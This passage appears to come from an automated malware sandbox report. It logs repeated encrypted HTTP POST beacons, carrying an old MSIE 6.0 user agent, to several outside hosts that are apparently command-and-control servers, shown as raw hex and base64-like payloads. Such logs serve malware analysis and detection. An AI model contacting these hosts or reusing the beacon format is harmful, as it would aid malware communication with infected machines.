6e 49 79 4d 36 39 59 75 49 43 57 30 6a 31 4e 54 41 6c 72 48 4a 33 72 74 37 6e 33 53 4f 62 53 36 34 43 71 4c 43 46 4c 6e 4d 4e 49 6e 48 37 76 39 6c 30 45 43 45 34 4a 79 37 76 34 34 77 6e 34 78 61 6b 4f 6c 41 68 68 33 47 46 74 64 35 6e 4b 36 54 44 63 7a 56 4d 35 61 45 68 33 78 78 77 73 6a 4e 49 44 67 2f 2f 39 59 72 41 7a 2f 44 32 52 6d 7a 4a 71 51 76 65 4f 4c 5a 33 33 6a 2b 77 37 48 4e 7a 6a 59 4b 75 32 6e 31 65 31 62 61 76 62 48 33 38 4a 51 6b 37 35 4d 38 32 52 46 79 35 6e 5a 52 7a 51 4c 73 6f 53 37 67 4d 6e 44 65 44 6d 4f 2f 34 36 4c 30 45 52 56 75 42 64 67 61 73 56 45 54 67 55 36 30 75 73 78 75 67 59 41 55 48 32 47 2f 56 41 54 47 4d 66 38 43 73 62 74 61 6f 72 45 78 49 43 42 67 54 66 4d 4b 48 72 67 4b 58 33 2b 7a 66 79 39 56 5a 33 66 7a 49 73 66 37 70 54 78 33 44 6d 37 41 37 56 56 4c 4f 2f 2b 35 4b 78 6c 4c 6b 6a 67 47 30 6f 4d 72 70 6e 42 4e 65 53 61 78 71 74 56 67 73 30 33 51 6c 34 58 2b 72 76 45 36 74 52 38 5a 53 78 66 34 59 57 66 2f 77 73 4c 31 77 46 37 66 30 69 52 47 6b 68 73 55 70 69 75 62 65 73 50 70 45 4a 74 36 51 3d 3d Data Ascii: JycPWgE9CwB6FfQ94HJorNrI38d/6gJdxWPbs7Xp9HgNhRHsvFt2FaboM2Bod8x1EYfz/60+6DoG190cJqgRE5UHpc7fjCw5V45ScZaOvxHy9jDo7uZCEkekMEpa7LP5oo2uhEzDZ8zc8y0PuJu4gx4wELW4jXA7UyUiPNv1xuCkBa6nm0jAUKBMzZPvpUnuxjMKgIKwvEPTGYBn19T9EHxQP6SP5ZCoz7Jgzu6lJwSD0+PIF2NzjSnbnIyM69YuICW0j1NTAlrHJ3rt7n3SObS64CqLCFLnMNInH7v9l0ECE4Jy7v44wn4xakOlAhh3GFtd5nK6TDczVM5aEh3xxwsjNIDg//9YrAz/D2RmzJqQveOLZ33j+w7HNzjYKu2n1e1bavbH38JQk75M82RFy5nZRzQLsoS7gMnDeDmO/46L0ERVuBdgasVETgU60usxugYAUH2G/VATGMf8CsbtaorExICBgTfMKHrgKX3+zfy9VZ3fzIsf7pTx3Dm7A7VVLO/+5KxlLkjgG0oMrpnBNeSaxqtVgs03Ql4X+rvE6tR8ZSxf4YWf/wsL1wF7f0iRGkhsUpiubesPpEJt6Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 64 68 6c 61 47 53 79 5a 2f 2f 2f 32 6e 2f 4a 5a 46 30 4b 39 43 44 38 56 75 4a 65 45 76 52 69 50 49 47 33 42 50 78 45 30 56 44 76 6e 49 6b 6a 42 71 73 4e 61 38 6f 6a 68 70 6f 67 6c 68 65 53 79 38 4d 39 43 49 74 76 31 2f 4d 73 38 53 6b 7a 45 5a 53 33 72 59 56 79 6b 31 49 69 76 51 34 4e 7a 76 6a 68 46 58 62 30 71 65 32 6c 70 68 30 56 41 70 75 72 6a 67 48 68 75 5a 58 50 43 72 79 50 37 59 66 62 76 6e 6e 6f 69 52 48 4a 44 64 63 65 48 58 56 65 56 79 4a 7a 50 48 65 56 57 68 48 64 4e 61 4a 4d 54 76 72 35 2b 73 59 72 51 54 54 5a 35 4c 64 68 6e 77 76 6d 44 4b 61 50 4b 51 34 44 67 41 48 4e 32 73 71 39 42 76 46 67 45 43 58 39 59 33 30 6f 53 53 77 4d 46 4c 59 34 45 31 77 68 33 4e 35 50 64 43 54 64 7a 39 44 79 4f 41 50 70 79 4b 31 7a 63 68 2f 6c 73 38 79 78 57 31 6b 4b 58 38 4c 69 70 32 63 6e 32 76 45 49 47 73 4c 6d 74 43 76 59 59 73 68 52 4b 46 54 39 63 37 33 35 35 4a 41 73 71 35 43 41 39 6d 58 73 43 55 6f 6c 6a 36 72 43 61 39 6e 65 41 6e 4a 68 4d 47 45 71 52 5a 46 37 35 6d 69 31 39 51 50 74 41 78 76 30 46 34 69 78 64 34 55 31 6e 56 2b 59 36 72 6f 2b 36 55 46 61 4b 4d 6d 72 72 7a 50 38 4f 75 55 6d 46 67 65 50 43 4e 32 2b 62 49 4d 32 65 4a 2f 6e 49 64 43 78 5a 46 76 68 4a 6c 46 6b 4b 4b 31 73 6d 42 64 32 77 6f 32 53 62 30 45 6e 64 62 36 54 47 57 6b 46 54 77 72 49 67 7a 79 74 53 4b 66 48 4a 6b 31 78 2b 52 55 32 66 44 65 6e 7a 7a 41 53 74 46 46 45 6d 59 66 35 35 2b 42 67 33 6e 62 62 69 7a 42 65 45 68 54 4a 31 6e 55 61 71 39 53 44 61 36 4b 50 37 2b 36 2b 72 52 5a 41 77 30 50 73 6a 30 32 54 4d 64 68 33 66 74 50 38 2f 45 77 63 74 61 6a 2f 75 79 75 2b 46 30 4c 30 75 58 73 6d 4c 48 71 59 48 6b 52 65 35 34 50 69 69 45 2f 46 78 42 44 6e 53 52 41 3d 3d Data Ascii: dhlaGSyZ///2n/JZF0K9CD8VuJeEvRiPIG3BPxE0VDvnIkjBqsNa8ojhpoglheSy8M9CItv1/Ms8SkzEZS3rYVyk1IivQ4NzvjhFXb0qe2lph0VApurjgHhuZXPCryP7YfbvnnoiRHJDdceHXVeVyJzPHeVWhHdNaJMTvr5+sYrQTTZ5LdhnwvmDKaPKQ4DgAHN2sq9BvFgECX9Y30oSSwMFLY4E1wh3N5PdCTdz9DyOAPpyK1zch/ls8yxW1kKX8Lip2cn2vEIGsLmtCvYYshRKFT9c7355JAsq5CA9mXsCUolj6rCa9neAnJhMGEqRZF75mi19QPtAxv0F4ixd4U1nV+Y6ro+6UFaKMmrrzP8OuUmFgePCN2+bIM2eJ/nIdCxZFvhJlFkKK1smBd2wo2Sb0Endb6TGWkFTwrIgzytSKfHJk1x+RU2fDenzzAStFFEmYf55+Bg3nbbizBeEhTJ1nUaq9SDa6KP7+6+rRZAw0Psj02TMdh3ftP8/Ewctaj/uyu+F0L0uXsmLHqYHkRe54PiiE/FxBDnSRA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 4a 41 36 45 67 6c 61 4e 44 41 41 6c 4f 68 36 61 4d 57 54 49 43 76 6c 63 4e 48 66 32 2f 53 5a 75 36 6c 35 44 32 55 78 46 66 54 32 38 48 77 72 77 47 4a 6f 59 57 6e 54 73 51 53 6a 6c 48 48 71 4c 68 54 42 44 36 42 51 36 6a 53 54 38 6f 67 4e 4b 6e 41 48 6f 77 53 6a 37 36 74 67 69 37 77 33 64 77 36 69 57 43 49 47 65 37 52 57 58 59 41 73 48 64 37 44 6c 64 55 69 33 69 78 68 5a 68 6f 4c 73 45 76 74 71 49 62 32 39 54 53 70 36 52 2f 64 6a 66 73 72 7a 76 39 76 74 66 67 45 52 53 79 7a 75 50 59 39 4a 5a 63 77 63 65 35 44 41 4c 58 5a 64 6e 64 6a 78 59 69 72 4c 78 71 36 42 37 6c 49 77 56 6b 6c 75 49 32 72 4d 35 66 36 55 79 36 54 55 6f 42 37 61 50 67 54 42 63 79 54 79 50 55 6d 2f 51 65 68 75 6a 39 71 56 6d 65 69 39 6f 51 76 62 38 65 6f 47 6c 67 44 46 2b 45 4e 63 48 37 37 68 72 37 43 6b 47 48 55 46 31 45 46 76 56 51 71 4a 77 39 42 44 56 63 32 57 38 6c 42 4c 72 62 55 39 49 4a 37 5a 47 53 62 6c 31 41 55 62 6b 35 74 4f 42 35 2f 36 30 2b 6d 4f 36 79 6e 37 71 33 78 57 63 4c 4a 2b 69 73 6f 6c 35 54 34 75 6d 36 66 4d 6b 36 6e 6a 69 4f 68 73 64 55 41 56 33 4b 67 64 45 32 37 51 6e 50 44 47 65 49 4a 65 7a 36 63 2f 5a 77 67 31 76 79 6f 5a 45 78 77 52 5a 71 70 64 30 71 39 76 4a 6e 55 79 6e 53 42 31 34 53 66 6b 61 50 6c 62 37 45 4d 57 77 5a 78 47 6c 63 76 65 6f 5a 46 4e 6f 53 66 62 47 46 31 71 74 70 70 43 77 47 6c 4a 67 66 6a 79 4b 61 48 68 67 36 38 74 65 5a 4b 74 5a 44 38 73 54 67 4a 50 6b 69 37 55 71 51 56 56 6f 71 7a 38 4e 30 55 48 58 53 37 72 41 67 73 32 63 4b 7a 66 74 65 6a 7a 77 63 73 44 31 6d 7a 75 79 62 36 5a 38 42 64 6e 77 37 58 45 37 62 53 70 7a 50 7a 38 5a 64 43 56 43 6f 58 72 64 53 61 6e 42 41 3d 3d Data Ascii: JA6EglaNDAAlOh6aMWTICvlcNHf2/SZu6l5D2UxFfT28HwrwGJoYWnTsQSjlHHqLhTBD6BQ6jST8ogNKnAHowSj76tgi7w3dw6iWCIGe7RWXYAsHd7DldUi3ixhZhoLsEvtqIb29TSp6R/djfsrzv9vtfgERSyzuPY9JZcwce5DALXZdndjxYirLxq6B7lIwVkluI2rM5f6Uy6TUoB7aPgTBcyTyPUm/Qehuj9qVmei9oQvb8eoGlgDF+ENcH77hr7CkGHUF1EFvVQqJw9BDVc2W8lBLrbU9IJ7ZGSbl1AUbk5tOB5/60+mO6yn7q3xWcLJ+isol5T4um6fMk6njiOhsdUAV3KgdE27QnPDGeIJez6c/Zwg1vyoZExwRZqpd0q9vJnUynSB14SfkaPlb7EMWwZxGlcveoZFNoSfbGF1qtppCwGlJgfjyKaHhg68teZKtZD8sTgJPki7UqQVVoqz8N0UHXS7rAgs2cKzftejzwcsD1mzuyb6Z8Bdnw7XE7bSpzPz8ZdCVCoXrdSanBA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.photo4b.comCache-Control: no-cacheData Raw: 6b 46 6e 56 53 52 6d 32 43 67 44 48 53 4d 6e 30 4b 43 6a 35 53 62 4a 5a 53 7a 78 33 68 55 5a 48 58 61 49 73 54 70 61 70 6c 41 55 50 75 4f 6b 41 55 55 32 44 73 7a 51 43 4e 48 49 72 33 6f 30 74 39 33 63 6d 62 67 42 36 68 47 4a 7a 55 2f 65 6a 43 67 78 33 50 54 5a 43 50 5a 64 50 49 66 72 62 64 68 2f 2f 55 53 4c 6e 43 51 6e 50 55 78 41 48 55 50 31 77 51 68 65 2f 42 56 45 4a 68 44 6b 77 34 51 35 2f 64 41 70 56 49 31 57 33 68 43 79 6a 2f 6a 48 63 70 39 64 31 33 34 58 78 2f 51 75 31 78 74 38 76 30 30 54 34 35 54 42 2f 77 48 63 47 38 68 4d 6c 55 32 6c 79 48 41 70 64 48 77 4a 43 64 50 61 54 68 47 43 53 44 37 6d 64 74 6e 31 62 65 42 31 68 2f 32 6e 4f 68 41 72 51 4b 41 63 61 41 2b 66 6c 6f 7a 49 44 44 38 73 5a 74 66 56 30 4c 46 4f 59 49 67 37 42 4b 66 70 36 37 56 51 46 4b 48 33 61 69 58 4f 62 63 66 6c 6d 75 30 46 37 46 77 41 5a 53 55 6c 6f 74 31 68 69 6a 75 6f 38 71 2b 75 72 58 61 59 65 31 39 4d 72 72 68 6d 6f 43 4f 38 6a 4c 54 45 62 44 71 6a 5a 5a 64 38 4c 6e 73 4e 38 4b 33 2f 59 36 5a 4a 75 43 6b 42 70 54 4e 31 72 67 57 56 75 63 36 38 46 72 31 78 43 75 39 34 72 66 39 59 6b 39 6d 61 72 63 65 32 5a 68 75 77 56 42 4d 4d 61 4d 6a 31 70 34 4e 70 56 41 58 4c 6e 6e 6e 33 51 32 52 56 4d 34 74 63 4d 33 7a 47 6d 2f 73 7a 74 31 74 49 6b 46 4d 74 45 61 43 6f 67 64 4d 67 71 59 7a 45 31 47 59 44 58 4c 56 31 74 51 54 62 6c 39 67 6a 4d 47 74 69 4a 35 6e 6a 78 2b 75 78 4a 71 53 43 4e 55 36 6b 75 37 68 48 59 6d 50 62 55 79 55 74 49 49 5a 73 75 73 47 44 34 41 63 75 4e 71 57 53 33 69 4b 2b 78 6d 76 7a 47 62 58 6b 38 39 4c 53 35 7a 67 77 36 45 4b 76 44 33 35 75 63 48 71 6c 65 39 43 4d 71 32 79 43 58 72 43 33 4e 63 65 6b 6c 58 74 45 59 70 36 67 4c 79 70 53 69 66 54 65 58 6c 7a 53 6c 67 4a 6a 52 51 35 34 56 56 66 5a 53 55 31 37 2b 41 46 4a 77 35 79 4c 69 62 45 7a 62 37 7a 6b 3d Data Ascii: kFnVSRm2CgDHSMn0KCj5SbJZSzx3hUZHXaIsTpaplAUPuOkAUU2DszQCNHIr3o0t93cmbgB6hGJzU/ejCgx3PTZCPZdPIfrbdh//USLnCQnPUxAHUP1wQhe/BVEJhDkw4Q5/dApVI1W3hCyj/jHcp9d134Xx/Qu1xt8v00T45TB/wHcG8hMlU2lyHApdHwJCdPaThGCSD7mdtn1beB1h/2nOhArQKAcaA+flozIDD8sZtfV0LFOYIg7BKfp67VQFKH3aiXObcflmu0F7FwAZSUlot1hijuo8q+urXaYe19MrrhmoCO8jLTEbDqjZZd8LnsN8K3/Y6ZJuCkBpTN1rgWVuc68Fr1xCu94rf9Yk9marce2ZhuwVBMMaMj1p4NpVAXLnnn3Q2RVM4tcM3zGm/szt1tIkFMtEaCogdMgqYzE1GYDXLV1tQTbl9gjMGtiJ5njx+uxJqSCNU6ku7hHYmPbUyUtIIZsusGD4AcuNqWS3iK+xmvzGbXk89LS5zgw6EKvD35ucHqle9CMq2yCXrC3NceklXtEYp6gLypSifTeXlzSlgJjRQ54VVfZSU17+AFJw5yLibEzb7zk=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 67 6f 46 55 49 75 32 39 45 51 44 33 32 4f 57 59 35 41 59 6e 32 36 61 30 48 34 72 62 71 79 43 35 63 57 56 72 30 56 2f 43 62 76 4f 56 43 79 5a 2f 38 53 36 46 31 61 48 4f 37 61 54 39 59 48 7a 59 46 76 39 32 41 41 70 4e 35 50 52 4e 68 4e 75 71 65 71 56 4d 48 78 38 67 72 66 54 42 68 76 52 75 74 2f 61 45 55 2f 44 77 42 38 53 6e 6f 74 59 56 50 46 32 2b 37 73 31 6d 74 4a 35 33 2f 62 73 4c 42 68 43 33 33 4d 70 4b 47 6f 6b 75 73 66 6e 61 61 51 38 57 67 31 34 6f 66 62 79 51 51 68 75 35 4a 53 4e 52 4a 57 36 32 42 71 61 47 47 6a 4e 51 56 66 39 5a 78 4b 32 44 74 38 50 61 64 58 53 31 39 65 5a 44 49 51 73 6b 59 4e 4a 72 33 4e 6b 38 48 75 50 73 4b 6f 55 37 75 70 32 4f 4a 4a 77 67 5a 75 57 63 33 48 62 67 78 55 66 77 47 2f 6e 58 4a 47 58 31 61 50 55 63 55 68 58 6d 56 59 33 79 41 77 6e 72 71 69 54 6f 51 35 69 59 79 78 79 68 37 51 2f 37 37 4b 2b 77 6e 6e 6c 62 39 49 31 6d 56 42 32 73 69 59 30 52 41 58 4a 49 6d 4d 38 78 38 72 62 69 5a 4d 4e 39 39 58 79 74 6d 4a 41 65 72 74 37 55 6e 44 70 39 52 75 62 41 58 4c 35 6a 6d 45 46 43 65 77 6d 47 41 33 69 53 38 68 64 58 6f 56 79 71 58 73 59 75 4b 2b 50 32 6a 54 75 70 66 74 2b 32 31 55 4b 74 58 52 42 4c 47 6e 6f 69 5a 5a 4d 70 49 37 57 2b 57 37 50 6c 63 4d 62 39 65 7a 57 56 61 4b 35 2b 5a 51 35 43 74 57 44 61 61 50 71 4c 31 62 63 36 6c 32 48 38 73 4d 6a 2b 73 6a 34 4d 58 46 6f 46 78 48 30 74 36 37 2b 48 76 55 49 6e 43 6e 6c 68 54 42 38 70 31 2b 49 61 2b 48 37 53 6a 7a 52 2b 6d 4a 38 58 7a 36 72 30 54 54 38 50 68 42 75 54 37 6d 6a 2f 48 66 4c 31 45 39 45 51 5a 33 68 41 41 34 54 6f 47 54 4a 65 45 73 70 6a 65 67 69 53 4f 66 59 6a 41 31 70 52 46 41 3d 3d Data Ascii: goFUIu29EQD32OWY5AYn26a0H4rbqyC5cWVr0V/CbvOVCyZ/8S6F1aHO7aT9YHzYFv92AApN5PRNhNuqeqVMHx8grfTBhvRut/aEU/DwB8SnotYVPF2+7s1mtJ53/bsLBhC33MpKGokusfnaaQ8Wg14ofbyQQhu5JSNRJW62BqaGGjNQVf9ZxK2Dt8PadXS19eZDIQskYNJr3Nk8HuPsKoU7up2OJJwgZuWc3HbgxUfwG/nXJGX1aPUcUhXmVY3yAwnrqiToQ5iYyxyh7Q/77K+wnnlb9I1mVB2siY0RAXJImM8x8rbiZMN99XytmJAert7UnDp9RubAXL5jmEFCewmGA3iS8hdXoVyqXsYuK+P2jTupft+21UKtXRBLGnoiZZMpI7W+W7PlcMb9ezWVaK5+ZQ5CtWDaaPqL1bc6l2H8sMj+sj4MXFoFxH0t67+HvUInCnlhTB8p1+Ia+H7SjzR+mJ8Xz6r0TT8PhBuT7mj/HfL1E9EQZ3hAA4ToGTJeEspjegiSOfYjA1pRFA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 4a 79 63 50 57 67 45 39 43 77 42 36 46 66 51 39 34 48 4a 6f 72 4e 72 49 33 38 64 2f 36 67 4a 64 78 57 50 62 73 37 58 70 39 48 67 4e 68 52 48 73 76 46 74 32 46 61 62 6f 4d 32 42 6f 64 38 78 31 45 59 66 7a 2f 36 30 2b 36 44 6f 47 31 39 30 63 4a 71 67 52 45 35 55 48 70 63 37 66 6a 43 77 35 56 34 35 53 63 5a 61 4f 76 78 48 79 39 6a 44 6f 37 75 5a 43 45 6b 65 6b 4d 45 70 61 37 4c 50 35 6f 6f 32 75 68 45 7a 44 5a 38 7a 63 38 79 30 50 75 4a 75 34 67 78 34 77 45 4c 57 34 6a 58 41 37 55 79 55 69 50 4e 76 31 78 75 43 6b 42 61 36 6e 6d 30 6a 41 55 4b 42 4d 7a 5a 50 76 70 55 6e 75 78 6a 4d 4b 67 49 4b 77 76 45 50 54 47 59 42 6e 31 39 54 39 45 48 78 51 50 36 53 50 35 5a 43 6f 7a 37 4a 67 7a 75 36 6c 4a 77 53 44 30 2b 50 49 46 32 4e 7a 6a 53 6e 62 6e 49 79 4d 36 39 59 75 49 43 57 30 6a 31 4e 54 41 6c 72 48 4a 33 72 74 37 6e 33 53 4f 62 53 36 34 43 71 4c 43 46 4c 6e 4d 4e 49 6e 48 37 76 39 6c 30 45 43 45 34 4a 79 37 76 34 34 77 6e 34 78 61 6b 4f 6c 41 68 68 33 47 46 74 64 35 6e 4b 36 54 44 63 7a 56 4d 35 61 45 68 33 78 78 77 73 6a 4e 49 44 67 2f 2f 39 59 72 41 7a 2f 44 32 52 6d 7a 4a 71 51 76 65 4f 4c 5a 33 33 6a 2b 77 37 48 4e 7a 6a 59 4b 75 32 6e 31 65 31 62 61 76 62 48 33 38 4a 51 6b 37 35 4d 38 32 52 46 79 35 6e 5a 52 7a 51 4c 73 6f 53 37 67 4d 6e 44 65 44 6d 4f 2f 34 36 4c 30 45 52 56 75 42 64 67 61 73 56 45 54 67 55 36 30 75 73 78 75 67 59 41 55 48 32 47 2f 56 41 54 47 4d 66 38 43 73 62 74 61 6f 72 45 78 49 43 42 67 54 66 4d 4b 48 72 67 4b 58 33 2b 7a 66 79 39 56 5a 33 66 7a 49 73 66 37 70 54 78 33 44 6d 37 41 37 56 56 4c 4f 2f 2b 35 4b 78 6c 4c 6b 6a 67 47 30 6f 4d 72 70 6e 42 4e 65 53 61 78 71 74 56 67 73 30 33 51 6c 34 58 2b 72 76 45 36 74 52 38 5a 53 78 66 34 59 57 66 2f 77 73 4c 31 77 46 37 66 30 69 52 47 6b 68 73 55 70 69 75 62 65 73 50 70 45 4a 74 36 51 3d 3d Data Ascii: JycPWgE9CwB6FfQ94HJorNrI38d/6gJdxWPbs7Xp9HgNhRHsvFt2FaboM2Bod8x1EYfz/60+6DoG190cJqgRE5UHpc7fjCw5V45ScZaOvxHy9jDo7uZCEkekMEpa7LP5oo2uhEzDZ8zc8y0PuJu4gx4wELW4jXA7UyUiPNv1xuCkBa6nm0jAUKBMzZPvpUnuxjMKgIKwvEPTGYBn19T9EHxQP6SP5ZCoz7Jgzu6lJwSD0+PIF2NzjSnbnIyM69YuICW0j1NTAlrHJ3rt7n3SObS64CqLCFLnMNInH7v9l0ECE4Jy7v44wn4xakOlAhh3GFtd5nK6TDczVM5aEh3xxwsjNIDg//9YrAz/D2RmzJqQveOLZ33j+w7HNzjYKu2n1e1bavbH38JQk75M82RFy5nZRzQLsoS7gMnDeDmO/46L0ERVuBdgasVETgU60usxugYAUH2G/VATGMf8CsbtaorExICBgTfMKHrgKX3+zfy9VZ3fzIsf7pTx3Dm7A7VVLO/+5KxlLkjgG0oMrpnBNeSaxqtVgs03Ql4X+rvE6tR8ZSxf4YWf/wsL1wF7f0iRGkhsUpiubesPpEJt6Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 67 6f 46 55 49 75 32 39 45 51 44 33 32 4f 57 59 35 41 59 6e 32 36 61 30 48 34 72 62 71 79 43 35 63 57 56 72 30 56 2f 43 62 76 4f 56 43 79 5a 2f 38 53 36 46 31 61 48 4f 37 61 54 39 59 48 7a 59 46 76 39 32 41 41 70 4e 35 50 52 4e 68 4e 75 71 65 71 56 4d 48 78 38 67 72 66 54 42 68 76 52 75 74 2f 61 45 55 2f 44 77 42 38 53 6e 6f 74 59 56 50 46 32 2b 37 73 31 6d 74 4a 35 33 2f 62 73 4c 42 68 43 33 33 4d 70 4b 47 6f 6b 75 73 66 6e 61 61 51 38 57 67 31 34 6f 66 62 79 51 51 68 75 35 4a 53 4e 52 4a 57 36 32 42 71 61 47 47 6a 4e 51 56 66 39 5a 78 4b 32 44 74 38 50 61 64 58 53 31 39 65 5a 44 49 51 73 6b 59 4e 4a 72 33 4e 6b 38 48 75 50 73 4b 6f 55 37 75 70 32 4f 4a 4a 77 67 5a 75 57 63 33 48 62 67 78 55 66 77 47 2f 6e 58 4a 47 58 31 61 50 55 63 55 68 58 6d 56 59 33 79 41 77 6e 72 71 69 54 6f 51 35 69 59 79 78 79 68 37 51 2f 37 37 4b 2b 77 6e 6e 6c 62 39 49 31 6d 56 42 32 73 69 59 30 52 41 58 4a 49 6d 4d 38 78 38 72 62 69 5a 4d 4e 39 39 58 79 74 6d 4a 41 65 72 74 37 55 6e 44 70 39 52 75 62 41 58 4c 35 6a 6d 45 46 43 65 77 6d 47 41 33 69 53 38 68 64 58 6f 56 79 71 58 73 59 75 4b 2b 50 32 6a 54 75 70 66 74 2b 32 31 55 4b 74 58 52 42 4c 47 6e 6f 69 5a 5a 4d 70 49 37 57 2b 57 37 50 6c 63 4d 62 39 65 7a 57 56 61 4b 35 2b 5a 51 35 43 74 57 44 61 61 50 71 4c 31 62 63 36 6c 32 48 38 73 4d 6a 2b 73 6a 34 4d 58 46 6f 46 78 48 30 74 36 37 2b 48 76 55 49 6e 43 6e 6c 68 54 42 38 70 31 2b 49 61 2b 48 37 53 6a 7a 52 2b 6d 4a 38 58 7a 36 72 30 54 54 38 50 68 42 75 54 37 6d 6a 2f 48 66 4c 31 45 39 45 51 5a 33 68 41 41 34 54 6f 47 54 4a 65 45 73 70 6a 65 67 69 53 4f 66 59 6a 41 31 70 52 46 41 3d 3d Data Ascii: goFUIu29EQD32OWY5AYn26a0H4rbqyC5cWVr0V/CbvOVCyZ/8S6F1aHO7aT9YHzYFv92AApN5PRNhNuqeqVMHx8grfTBhvRut/aEU/DwB8SnotYVPF2+7s1mtJ53/bsLBhC33MpKGokusfnaaQ8Wg14ofbyQQhu5JSNRJW62BqaGGjNQVf9ZxK2Dt8PadXS19eZDIQskYNJr3Nk8HuPsKoU7up2OJJwgZuWc3HbgxUfwG/nXJGX1aPUcUhXmVY3yAwnrqiToQ5iYyxyh7Q/77K+wnnlb9I1mVB2siY0RAXJImM8x8rbiZMN99XytmJAert7UnDp9RubAXL5jmEFCewmGA3iS8hdXoVyqXsYuK+P2jTupft+21UKtXRBLGnoiZZMpI7W+W7PlcMb9ezWVaK5+ZQ5CtWDaaPqL1bc6l2H8sMj+sj4MXFoFxH0t67+HvUInCnlhTB8p1+Ia+H7SjzR+mJ8Xz6r0TT8PhBuT7mj/HfL1E9EQZ3hAA4ToGTJeEspjegiSOfYjA1pRFA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 33 4a 58 43 53 58 32 31 43 67 41 4f 66 4d 74 64 4e 50 68 2b 4f 72 62 6d 38 68 57 72 45 73 52 32 41 55 37 69 68 38 6e 57 6f 64 42 30 62 5a 6a 6a 53 4a 75 70 75 74 4b 73 70 33 43 66 69 54 75 35 77 58 34 32 71 4f 53 6d 79 53 44 6c 4e 46 4e 2f 63 44 32 5a 4d 56 71 74 5a 31 69 36 38 67 69 4e 7a 2b 50 31 43 51 4a 32 4c 51 6f 46 6a 48 74 51 6a 53 6f 33 4e 32 6b 4b 47 72 74 49 56 38 56 58 47 36 68 79 4e 50 53 36 6a 38 66 7a 36 66 44 6e 62 63 70 5a 38 30 33 4d 75 4e 4f 78 65 42 6d 52 41 33 44 6f 44 31 61 42 41 6f 73 73 38 55 6f 62 67 6e 72 69 49 51 6c 68 46 73 4b 65 53 6b 64 6a 30 32 4f 72 50 47 54 68 6e 46 4b 51 39 42 6c 6a 32 71 4b 32 72 76 4c 6b 42 43 73 52 42 61 4d 2f 58 34 6a 6c 6f 7a 44 32 71 7a 67 62 79 63 6b 73 4f 4d 77 79 62 73 4e 34 70 46 38 6d 58 48 49 2f 62 43 46 6e 72 35 6b 51 55 79 44 72 48 58 31 70 73 2b 6e 70 48 36 6e 30 71 49 75 59 6d 44 64 52 4d 75 67 62 74 36 62 31 2f 68 79 4e 72 77 39 75 74 4d 79 37 6b 54 39 69 66 50 38 56 5a 42 63 55 61 42 47 64 39 4e 6d 45 6b 41 52 70 51 4c 72 31 50 69 4f 59 36 38 66 68 68 69 35 2b 5a 42 62 38 59 76 74 41 61 65 54 79 42 73 64 75 58 5a 76 64 6b 6b 77 55 37 30 55 6e 35 53 42 4d 64 79 65 71 70 70 68 36 48 75 61 72 33 4e 52 2f 48 6c 35 73 69 32 74 74 4a 66 78 6b 6a 69 44 6f 2b 2b 32 57 55 6a 56 6a 45 64 62 5a 6f 34 4f 74 6c 37 31 71 4c 51 45 74 4f 30 52 4a 51 6a 6c 4c 44 36 77 6b 47 44 4a 56 73 63 4f 37 36 64 55 48 5a 4b 71 44 4b 44 76 55 55 74 64 6d 35 56 74 79 33 43 45 41 71 78 55 2b 69 6d 51 39 2b 67 72 30 51 46 6e 79 76 45 57 7a 4a 42 51 34 2b 36 41 67 48 6e 78 58 34 53 69 62 4f 58 4b 5a 6e 41 54 37 64 53 67 78 42 57 33 6d 75 31 37 6b 65 54 68 78 68 6e 34 41 46 6f 71 2b 41 42 6f 3d Data Ascii: 3JXCSX21CgAOfMtdNPh+Orbm8hWrEsR2AU7ih8nWodB0bZjjSJuputKsp3CfiTu5wX42qOSmySDlNFN/cD2ZMVqtZ1i68giNz+P1CQJ2LQoFjHtQjSo3N2kKGrtIV8VXG6hyNPS6j8fz6fDnbcpZ803MuNOxeBmRA3DoD1aBAoss8UobgnriIQlhFsKeSkdj02OrPGThnFKQ9Blj2qK2rvLkBCsRBaM/X4jlozD2qzgbycksOMwybsN4pF8mXHI/bCFnr5kQUyDrHX1ps+npH6n0qIuYmDdRMugbt6b1/hyNrw9utMy7kT9ifP8VZBcUaBGd9NmEkARpQLr1PiOY68fhhi5+ZBb8YvtAaeTyBsduXZvdkkwU70Un5SBMdyeqpph6Huar3NR/Hl5si2ttJfxkjiDo++2WUjVjEdbZo4Otl71qLQEtO0RJQjlLD6wkGDJVscO76dUHZKqDKDvUUtdm5Vty3CEAqxU+imQ9+gr0QFnyvEWzJBQ4+6AgHnxX4SibOXKZnAT7dSgxBW3mu17keThxhn4AFoq+ABo=
